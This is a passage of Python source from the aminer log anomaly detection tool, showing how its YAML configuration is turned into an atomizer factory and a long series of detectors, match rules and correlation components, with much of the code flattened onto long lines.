    ``SubhandlerFilter`` under the component name "AtomFilter" and installs a ``SimpleByteStreamLineAtomizerFactory`` as
    ``analysis_context.atomizer_factory``.

    @param analysis_context the context the AtomFilter component is registered on and the atomizer factory is attached to.
    @param parsing_model the root parser element handed to the atomizer factory.
    @param parser_model_dict the id -> parser element mapping handed to the atomizer factory.
    @return a tuple (anomaly_event_handlers, atom_filter): the still-empty handler list that later build steps fill,
    and the filter all atoms are distributed through.
    @raise ValueError if a LogResourceList entry declares both a "json" and an "xml" format.
    """
    # Some generic imports.
    from aminer.analysis import AtomFilters
    # Create all global handler lists here and append the real handlers later on.
    # Use this filter to distribute all atoms to the analysis handlers.
    atom_filter = AtomFilters.SubhandlerFilter(None)
    analysis_context.register_component(atom_filter, component_name="AtomFilter")
    anomaly_event_handlers = []
    # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient.
    from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory
    timestamp_paths = yaml_data['Input']['timestamp_paths']
    # A single path given as a plain string is normalised to a one-element list.
    if isinstance(timestamp_paths, str):
        timestamp_paths = [timestamp_paths]
    use_real_time = yaml_data['Input']['use_real_time']
    continuous_timestamp_missing_warning = yaml_data['Input']['continuous_timestamp_missing_warning']
    sync_wait_time = yaml_data['Input']['sync_wait_time']
    # The separator is configured as text; decode the textual escapes for newline, tab, carriage return, backslash and
    # backspace into raw bytes. Only this fixed set is recognised, and the double backslash is decoded last, so a
    # backslash directly followed by n/t/r is always consumed as an escape.
    eol_sep = yaml_data['Input']['eol_sep'].encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").\
        replace(b"\\\\", b"\\").replace(b"\\b", b"\b")
    json_format = yaml_data['Input']['json_format']
    xml_format = yaml_data['Input']['xml_format']
    # Wrap the atom filter in the optional multi-source synchronisation and timestamp-adjustment stages. With both
    # enabled, the timestamp adjuster is the sync stage's handler and the adjuster's handler is atom_filter.
    if yaml_data['Input']['multi_source'] is True:
        from aminer.input.SimpleMultisourceAtomSync import SimpleMultisourceAtomSync
        if yaml_data['Input']['adjust_timestamps'] is True:
            from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust
            atom_handler_list = [SimpleMultisourceAtomSync([SimpleMonotonicTimestampAdjust([atom_filter])], sync_wait_time=sync_wait_time)]
        else:
            atom_handler_list = [SimpleMultisourceAtomSync([atom_filter], sync_wait_time=sync_wait_time)]
    else:
        if yaml_data['Input']['adjust_timestamps'] is True:
            from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust
            atom_handler_list = [SimpleMonotonicTimestampAdjust([atom_filter])]
        else:
            atom_handler_list = [atom_filter]
    # Normalise every LogResourceList entry into a dict keyed by its url. An entry may be a bare url string or a dict;
    # missing "json", "xml" and "parser_id" keys default to None.
    log_resources = {}
    for resource in yaml_data['LogResourceList']:
        obj = {}
        if isinstance(resource, str):
            obj["url"] = decode_string_as_byte_string(resource)
        elif isinstance(resource, dict):
            obj = resource
            if "json" in obj and "xml" in obj:
                msg = "Log resources can not be in the json and xml format at the same time."
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
        # NOTE(review): an entry that is neither str nor dict, or a dict without a "url" key, reaches obj["url"] below
        # and fails with a KeyError rather than a Config-Error message — consider validating the entry here.
        if "json" not in obj:
            obj["json"] = None
        if "xml" not in obj:
            obj["xml"] = None
        if "parser_id" not in obj:
            obj["parser_id"] = None
        if isinstance(obj["url"], str):
            obj["url"] = decode_string_as_byte_string(obj["url"])
        # Keyed by url: a url listed twice silently keeps only the last entry.
        log_resources[obj["url"]] = obj
    analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(
        parsing_model, atom_handler_list, anomaly_event_handlers, default_timestamp_path_list=timestamp_paths, eol_sep=eol_sep,
        json_format=json_format, xml_format=xml_format, parser_model_dict=parser_model_dict, log_resources=log_resources,
        use_real_time=use_real_time, continuous_timestamp_missing_warning=continuous_timestamp_missing_warning)
    return anomaly_event_handlers, atom_filter


def build_analysis_components(analysis_context, anomaly_event_handlers, atom_filter, parsing_model):
    """Build the analysis components."""
    suppress_detector_list = analysis_context.suppress_detector_list
    has_unparsed_handler = False
    has_new_match_path_handler = False
    if 'Analysis' in yaml_data and yaml_data['Analysis'] is not None:
        analysis_dict = {}
        match_action_dict = {}
        match_rules_dict = {}
        correlation_rules = {}
        # changed order if ETD is defined.
        for item in yaml_data['Analysis']:
            if item['type'].name == 'EventTypeDetector':
                index = yaml_data['Analysis'].index(item)
                new_analysis_list = [item]
                del yaml_data['Analysis'][index]
                new_analysis_list += yaml_data['Analysis']
                yaml_data['Analysis'] = new_analysis_list
                break
        for item in yaml_data['Analysis']:
            if item['type'].name in ('SimpleUnparsedAtomHandler', 'VerboseUnparsedAtomHandler'):
                has_unparsed_handler = True
                # make room for the UnparsedAtomHandler.
atom_filter.add_handler(None, True) break for item in yaml_data['Analysis']: if item['type'].name == 'NewMatchPathDetector': has_new_match_path_handler = True break has_new_match_path_handler, has_unparsed_handler = add_default_analysis_components( analysis_context, anomaly_event_handlers, atom_filter, has_new_match_path_handler, has_unparsed_handler, parsing_model) for item in yaml_data['Analysis']: stop_when_handled_flag = False if item['id'] == 'None': comp_name = None else: comp_name = item['id'] if analysis_context.get_component_by_name(comp_name) is not None: raise ValueError(f'Config-Error: The id "{comp_name}" occurred multiple times in Analysis!') if 'learn_mode' in item: learn = item['learn_mode'] else: if 'LearnMode' not in yaml_data: msg = 'Config-Error: LearnMode must be defined if an analysis component does not define learn_mode.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) learn = yaml_data['LearnMode'] func = item['type'].func if item['suppress']: if comp_name is None: raise ValueError(f'Config-Error: id must be specified for the analysis component {item["type"]} to enable suppression.') suppress_detector_list.append(comp_name) if item['type'].name == 'NewMatchPathValueDetector': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, learn_mode=learn, persistence_id=item['persistence_id'], output_logline=item['output_logline'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'MatchPathFilter': parsed_atom_handler_lookup_list = [] for atom_handler in item['parsed_atom_handler_lookup_list']: if atom_handler[1] is not None: if analysis_context.get_component_by_name(atom_handler[1]) is None: msg = f'The atom handler {atom_handler[1]} does not exist!' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) atom_handler[1] = analysis_context.get_component_by_name(atom_handler[1]) parsed_atom_handler_lookup_list.append(tuple(i for i in atom_handler)) default_parsed_atom_handler = item['default_parsed_atom_handler'] if default_parsed_atom_handler is not None: if analysis_context.get_component_by_name(default_parsed_atom_handler) is None: msg = f'The atom handler {default_parsed_atom_handler} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) default_parsed_atom_handler = analysis_context.get_component_by_name(default_parsed_atom_handler) tmp_analyser = func(parsed_atom_handler_lookup_list, default_parsed_atom_handler=default_parsed_atom_handler) elif item['type'].name == 'MatchValueFilter': parsed_atom_handler_dict = {} for atom_handler in item['parsed_atom_handler_dict']: if analysis_context.get_component_by_name(atom_handler) is None: msg = f'The atom handler {atom_handler} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) parsed_atom_handler_dict[atom_handler] = analysis_context.get_component_by_name(atom_handler) default_parsed_atom_handler = item['default_parsed_atom_handler'] if default_parsed_atom_handler is not None: if analysis_context.get_component_by_name(default_parsed_atom_handler) is None: msg = f'The atom handler {default_parsed_atom_handler} does not exist!' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) default_parsed_atom_handler = analysis_context.get_component_by_name(default_parsed_atom_handler) tmp_analyser = func(item['path'], parsed_atom_handler_dict, default_parsed_atom_handler=default_parsed_atom_handler) elif item['type'].name == 'PCADetector': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, persistence_id=item['persistence_id'], window_size=item['window_size'], min_anomaly_score=item['min_anomaly_score'], min_variance=item['min_variance'], num_windows=item['num_windows'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'NewMatchPathValueComboDetector': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, learn_mode=learn, persistence_id=item['persistence_id'], allow_missing_values_flag=item['allow_missing_values'], output_logline=item['output_logline'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'MissingMatchPathValueDetector': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, learn_mode=learn, persistence_id=item['persistence_id'], default_interval=item['check_interval'], realert_interval=item['realert_interval'], combine_values=item['combine_values'], output_logline=item['output_logline'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'MissingMatchPathListValueDetector': 
tmp_analyser = func(analysis_context.aminer_config, item['path'], anomaly_event_handlers, learn_mode=learn, persistence_id=item['persistence_id'], default_interval=item['check_interval'], realert_interval=item['realert_interval'], combine_values=item['combine_values'], output_logline=item['output_logline'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'EventSequenceDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, item['id_path_list'], target_path_list=item['paths'], persistence_id=item['persistence_id'], seq_len=item['seq_len'], learn_mode=learn, timeout=item['timeout'], allow_missing_id=item['allow_missing_id'], output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'ValueRangeDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, item['id_path_list'], target_path_list=item['paths'], persistence_id=item['persistence_id'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'CharsetDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, item['id_path_list'], target_path_list=item['paths'], persistence_id=item['persistence_id'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], 
log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'EntropyDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, target_path_list=item['paths'], prob_thresh=item['prob_thresh'], default_freqs=item['default_freqs'], skip_repetitions=item['skip_repetitions'], persistence_id=item['persistence_id'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'EventFrequencyDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, target_path_list=item['paths'], scoring_path_list=item['scoring_path_list'], unique_path_list=item['unique_path_list'], persistence_id=item['persistence_id'], window_size=item['window_size'], num_windows=item['num_windows'], confidence_factor=item['confidence_factor'], empty_window_warnings=item['empty_window_warnings'], early_exceeding_anomaly_output=item['early_exceeding_anomaly_output'], set_lower_limit=item['set_lower_limit'], set_upper_limit=item['set_upper_limit'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], season=item['season'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'EventCountClusterDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, target_path_list=item['paths'], persistence_id=item['persistence_id'], id_path_list=item['id_path_list'], window_size=item['window_size'], 
num_windows=item['num_windows'], confidence_factor=item['confidence_factor'], idf=item['idf'], norm=item['norm'], add_normal=item['add_normal'], check_empty_windows=item['check_empty_windows'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'TimeCorrelationDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, item['parallel_check_count'], persistence_id=item['persistence_id'], record_count_before_event=item['record_count_before_event'], output_logline=item['output_logline'], use_path_match=item['use_path_match'], use_value_match=item['use_value_match'], min_rule_attributes=item['min_rule_attributes'], max_rule_attributes=item['max_rule_attributes'], log_resource_ignore_list=item['log_resource_ignore_list']) elif item['type'].name == 'ParserCount': tmp_analyser = func( analysis_context.aminer_config, item['paths'], anomaly_event_handlers, report_interval=item['report_interval'], target_label_list=item['labels'], split_reports_flag=item['split_reports_flag'], log_resource_ignore_list=item['log_resource_ignore_list']) elif item['type'].name == 'EventCorrelationDetector': tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, target_path_list=item['paths'], max_hypotheses=item['max_hypotheses'], hypothesis_max_delta_time=item['hypothesis_max_delta_time'], generation_probability=item['generation_probability'], generation_factor=item['generation_factor'], max_observations=item['max_observations'], p0=item['p0'], alpha=item['alpha'], candidates_size=item['candidates_size'], hypotheses_eval_delta_time=item['hypotheses_eval_delta_time'], constraint_list=item['constraint_list'], 
delta_time_to_discard_hypothesis=item['delta_time_to_discard_hypothesis'], check_rules_flag=item['check_rules_flag'], learn_mode=learn, ignore_list=item['ignore_list'], persistence_id=item['persistence_id'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'NewMatchIdValueComboDetector': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, id_path_list=item['id_path_list'], min_allowed_time_diff=item['min_allowed_time_diff'], learn_mode=learn, persistence_id=item['persistence_id'], allow_missing_values_flag=item['allow_missing_values'], output_logline=item['output_logline'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'SlidingEventFrequencyDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, target_path_list=item['paths'], scoring_path_list=item['scoring_path_list'], persistence_id=item['persistence_id'], window_size=item['window_size'], set_upper_limit=item['set_upper_limit'], local_maximum_threshold=item['local_maximum_threshold'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'LinearNumericBinDefinition': if comp_name is None: msg = f'The {item["type"].name} must have an id!' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) analysis_dict[comp_name] = func(item['lower_limit'], item['bin_size'], item['bin_count'], item['outlier_bins_flag']) continue elif item['type'].name == 'ModuloTimeBinDefinition': if comp_name is None: msg = f'The {item["type"].name} must have an id!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) analysis_dict[comp_name] = func(item['modulo_value'], item['time_unit'], item['lower_limit'], item['bin_size'], item['bin_count'], item['outlier_bins_flag']) continue elif item['type'].name == 'HistogramAnalysis': histogram_definitions = [] for histogram_definition in item['histogram_defs']: if len(histogram_definition) != 2: msg = 'Every item of the histogram_definitions must have an size of 2!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if histogram_definition[1] not in analysis_dict: msg = f'{histogram_definition[1]} first must be defined before used.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) histogram_definitions.append((histogram_definition[0], analysis_dict[histogram_definition[1]])) tmp_analyser = func(analysis_context.aminer_config, histogram_definitions, item['report_interval'], anomaly_event_handlers, reset_after_report_flag=item['reset_after_report_flag'], output_logline=item['output_logline'], log_resource_ignore_list=item['log_resource_ignore_list']) elif item['type'].name == 'PathDependentHistogramAnalysis': if item['bin_definition'] not in analysis_dict: msg = f'{item["bin_definition"]} first must be defined before used.' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) tmp_analyser = func( analysis_context.aminer_config, item['path'], analysis_dict[item['bin_definition']], item['report_interval'], anomaly_event_handlers, reset_after_report_flag=item['reset_after_report_flag'], output_logline=item['output_logline'], log_resource_ignore_list=item['log_resource_ignore_list']) elif item['type'].name == 'EnhancedNewMatchPathValueComboDetector': tuple_transformation_function = None if item['tuple_transformation_function'] == 'demo': tuple_transformation_function = tuple_transformation_function_demo_print_every_10th_value tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, persistence_id=item['persistence_id'], allow_missing_values_flag=item['allow_missing_values'], learn_mode=learn, tuple_transformation_function=tuple_transformation_function, output_logline=item['output_logline'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) global enhanced_new_match_path_value_combo_detector_reference enhanced_new_match_path_value_combo_detector_reference = tmp_analyser elif item['type'].name == 'MatchFilter': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, target_value_list=item['value_list'], output_logline=item['output_logline']) elif item['type'].name == 'MatchValueAverageChangeDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, item['timestamp_path'], item['paths'], item['min_bin_elements'], item['min_bin_time'], debug_mode=item['debug_mode'], persistence_id=item['persistence_id'], output_logline=item['output_logline'], avg_factor=item['avg_factor'], var_factor=item['var_factor'], learn_mode=learn, log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], 
stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'MatchValueStreamWriter': stream = sys.stdout if item['stream'] == 'sys.stderr': stream = sys.stderr tmp_analyser = func(stream, item['paths'], item['separator'].encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace( b"\\r", b"\r").replace(b"\\\\", b"\\").replace(b"\\b", b"\b"), item['missing_value_string'].encode().replace( b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").replace(b"\\\\", b"\\").replace(b"\\b", b"\b"), log_resource_ignore_list=item['log_resource_ignore_list']) elif item['type'].name == 'NewMatchPathDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, persistence_id=item['persistence_id'], learn_mode=learn, output_logline=item['output_logline'], log_resource_ignore_list=item['log_resource_ignore_list'], stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif 'MatchAction' in item['type'].name: if comp_name is None: msg = f'The {item["type"].name} must have an id!' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if item['type'].name == 'EventGenerationMatchAction': tmp_analyser = func(item['event_type'], item['event_message'], anomaly_event_handlers) elif item['type'].name == 'AtomFilterMatchAction': if 'subhandler_list' in item: tmp_analyser = func([analysis_context.get_component_by_name(component) for component in item['subhandler_list']], stop_when_handled_flag=item['stop_when_handled_flag']) if item['delete_components']: for component_name in item['subhandler_list']: component = analysis_context.get_component_by_name(component_name) for i, val in enumerate(atom_filter.subhandler_list): if val[0] == component: del atom_filter.subhandler_list[i] break else: tmp_analyser = func([handler for handler, stop_when_handled_flag in atom_filter.subhandler_list], stop_when_handled_flag=item['stop_when_handled_flag']) match_action_dict[comp_name] = tmp_analyser continue elif 'MatchRule' in item['type'].name: if comp_name is None: msg = f'The {item["type"].name} must have an id!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) match_action = None if item['match_action'] is not None: if item['match_action'] not in match_action_dict: msg = f'The match action {item["match_action"]} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) match_action = match_action_dict[item['match_action']] if item['type'].name in ('AndMatchRule', 'OrMatchRule', 'ParallelMatchRule'): sub_rules = [] for sub_rule in item['sub_rules']: if sub_rule not in match_rules_dict: msg = f'The sub match rule {sub_rule} does not exist!' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) sub_rules.append(match_rules_dict[sub_rule]) tmp_analyser = func(sub_rules, match_action=match_action) if item['type'].name == 'ValueDependentDelegatedMatchRule': rule_lookup_dict = {} for key, rule in item['rule_lookup_dict'].items(): if rule not in match_rules_dict: msg = f'The match rule {rule} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) rule_lookup_dict[ast.literal_eval(key)] = match_rules_dict[rule] tmp_analyser = func( item['paths'], rule_lookup_dict, default_rule=match_rules_dict[item['default_rule']], match_action=match_action) if item['type'].name == 'NegationMatchRule': if item['sub_rule'] not in match_rules_dict: msg = f'The match rule {item["sub_rule"]} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) sub_rule = match_rules_dict[item['sub_rule']] tmp_analyser = func(sub_rule, match_action=match_action) if item['type'].name in ('PathExistsMatchRule', 'IPv4InRFC1918MatchRule'): tmp_analyser = func(item['path'], match_action=match_action) if item['type'].name == 'ValueMatchRule': if isinstance(item['value'], str): item['value'] = item['value'].encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").\ replace(b"\\\\", b"\\").replace(b"\\b", b"\b") tmp_analyser = func(item['path'], item['value'], match_action=match_action) if item['type'].name == 'ValueListMatchRule': value_list = [] for val in item['value_list']: if isinstance(val, str): val = val.encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").\ replace(b"\\\\", b"\\").replace(b"\\b", b"\b") value_list.append(val) tmp_analyser = func(item['path'], value_list, match_action=match_action) if item['type'].name == 'ValueRangeMatchRule': tmp_analyser = func(item['path'], item['lower_limit'], item['upper_limit'], match_action) if item['type'].name == 'StringRegexMatchRule': import re tmp_analyser = func(item['path'], 
re.compile(item['regex'].encode()), match_action=match_action) if item['type'].name == 'ModuloTimeMatchRule': # tzinfo parameter cannot be used yet.. tmp_analyser = func(item['path'], item['seconds_modulo'], item['lower_limit'], item['upper_limit'], match_action=match_action) if item['type'].name == 'ValueDependentModuloTimeMatchRule': # tzinfo parameter cannot be used yet.. limit_lookup_dict = {} for key in item['limit_lookup_dict'].keys(): if isinstance(key, str): limit_lookup_dict[key.encode()] = item['limit_lookup_dict'][key] else: limit_lookup_dict[key] = item['limit_lookup_dict'][key] tmp_analyser = func(item['path'], item['seconds_modulo'], item['paths'], limit_lookup_dict, default_limit=item['default_limit'], match_action=match_action) if item['type'].name == 'DebugMatchRule': tmp_analyser = func(debug_match_result=item['debug_mode'], match_action=match_action) if item['type'].name == 'DebugHistoryMatchRule': # object_history is not supported yet.. tmp_analyser = func(debug_match_result=item['debug_mode'], match_action=match_action) match_rules_dict[comp_name] = tmp_analyser continue elif item['type'].name == 'CorrelationRule': artefact_match_parameters = [] for match_parameters in item['artefact_match_parameters']: artefact_match_parameters.append(tuple(i for i in match_parameters)) tmp_analyser = func(item['rule_id'], item['min_time_delta'], item['max_time_delta'], artefact_match_parameters=artefact_match_parameters, max_violations=item['max_violations']) correlation_rules[item['rule_id']] = tmp_analyser continue elif item['type'].name == 'EventClassSelector': if item['artefact_a_rules'] is None and item['artefact_b_rules'] is None: msg = 'At least one of the EventClassSelector\'s rules must not be None!' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) artefact_a_rules = None artefact_b_rules = None if item['artefact_a_rules'] is not None: artefact_a_rules = [] for rule in item['artefact_a_rules']: if rule not in correlation_rules: msg = f'The correlation rule {rule} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) artefact_a_rules.append(correlation_rules[rule]) if item['artefact_b_rules'] is not None: artefact_b_rules = [] for rule in item['artefact_b_rules']: if rule not in correlation_rules: msg = f'The correlation rule {rule} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) artefact_b_rules.append(correlation_rules[rule]) tmp_analyser = func(item['action_id'], artefact_a_rules, artefact_b_rules) match_action_dict[item['action_id']] = tmp_analyser continue elif item['type'].name == 'TimeCorrelationViolationDetector': ruleset = [] for rule in item['ruleset']: if rule not in match_rules_dict: msg = f'The match rule {rule} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) ruleset.append(match_rules_dict[rule]) tmp_analyser = func(analysis_context.aminer_config, ruleset, anomaly_event_handlers, log_resource_ignore_list=item['log_resource_ignore_list']) elif item['type'].name == 'TimestampsUnsortedDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, exit_on_error_flag=item['exit_on_error_flag'], output_logline=item['output_logline']) elif item['type'].name == 'AllowlistViolationDetector': allowlist_rules = [] for rule in item['allowlist_rules']: if rule not in match_rules_dict: msg = f'The match rule {rule} does not exist!' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) allowlist_rules.append(match_rules_dict[rule]) tmp_analyser = func(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers, output_logline=item['output_logline'], log_resource_ignore_list=item['log_resource_ignore_list']) elif item['type'].name == 'EventTypeDetector': tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, persistence_id=item['persistence_id'], target_path_list=item['paths'], id_path_list=item['id_path_list'], allow_missing_id=item['allow_missing_id'], allowed_id_tuples=item['allowed_id_tuples'], min_num_vals=item['min_num_vals'], max_num_vals=item['max_num_vals'], save_values=item['save_values'], log_resource_ignore_list=item['log_resource_ignore_list']) elif item['type'].name == 'VariableTypeDetector': etd = analysis_context.get_component_by_name(item['event_type_detector']) if etd is None: msg = f'The defined EventTypeDetector {item["event_type_detector"]} does not exist!' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, etd, persistence_id=item['persistence_id'], target_path_list=item['paths'], gof_alpha=item['gof_alpha'], s_gof_alpha=item['s_gof_alpha'], s_gof_bt_alpha=item['s_gof_bt_alpha'], d_alpha=item['d_alpha'], d_bt_alpha=item['d_bt_alpha'], div_thres=item['div_thres'], sim_thres=item['sim_thres'], indicator_thres=item['indicator_thres'], num_init=item['num_init'], num_update=item['num_update'], num_update_unq=item['num_update_unq'], num_s_gof_values=item['num_s_gof_values'], num_s_gof_bt=item['num_s_gof_bt'], num_d_bt=item['num_d_bt'], num_pause_discrete=item['num_pause_discrete'], num_pause_others=item['num_pause_others'], test_gof_int=item['test_gof_int'], num_stop_update=item['num_stop_update'], silence_output_without_confidence=item['silence_output_without_confidence'], silence_output_except_indicator=item['silence_output_except_indicator'], num_var_type_hist_ref=item['num_var_type_hist_ref'], num_update_var_type_hist_ref=item['num_update_var_type_hist_ref'], num_var_type_considered_ind=item['num_var_type_considered_ind'], num_stat_stop_update=item['num_stat_stop_update'], num_updates_until_var_reduction=item['num_updates_until_var_reduction'], var_reduction_thres=item['var_reduction_thres'], num_skipped_ind_for_weights=item['num_skipped_ind_for_weights'], num_ind_for_weights=item['num_ind_for_weights'], used_multinomial_test=item['used_multinomial_test'], use_empiric_distr=item['use_empiric_distr'], used_range_test=item['used_range_test'], range_alpha=item['range_alpha'], range_threshold=item['range_threshold'], range_limits_factor=item['range_limits_factor'], num_reinit_range=item['num_reinit_range'], dw_alpha=item['dw_alpha'], output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list'], learn_mode=learn, log_resource_ignore_list=item['log_resource_ignore_list'], 
stop_learning_time=item['stop_learning_time'], stop_learning_no_anomaly_time=item['stop_learning_no_anomaly_time']) elif item['type'].name == 'VariableCorrelationDetector': etd = analysis_context.get_component_by_name(item['event_type_detector']) if etd is None: msg = f'The defined EventTypeDetector {item["event_type_detector"]} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, etd, persistence_id=item['persistence_id'], target_path_list=item['paths'], num_init=item['num_init'], num_update=item['num_update'], disc_div_thres=item['disc_div_thres'], num_steps_create_new_rules=item['num_steps_create_new_rules'], num_upd_until_validation=item['num_upd_until_validation'], num_end_learning_phase=item['num_end_learning_phase'], check_cor_thres=item['check_cor_thres'], check_cor_prob_thres=item['check_cor_prob_thres'], check_cor_num_thres=item['check_cor_num_thres'], min_values_cors_thres=item['min_values_cors_thres'], new_vals_alarm_thres=item['new_vals_alarm_thres'], num_bt=item['num_bt'], alpha_bt=item['alpha_bt'], used_homogeneity_test=item['used_homogeneity_test'], alpha_chisquare_test=item['alpha_chisquare_test'], max_dist_rule_distr=item['max_dist_rule_distr'], used_presel_meth=item['used_presel_meth'], intersect_presel_meth=item['intersect_presel_meth'], percentage_random_cors=item['percentage_random_cors'], match_disc_vals_sim_tresh=item['match_disc_vals_sim_tresh'], 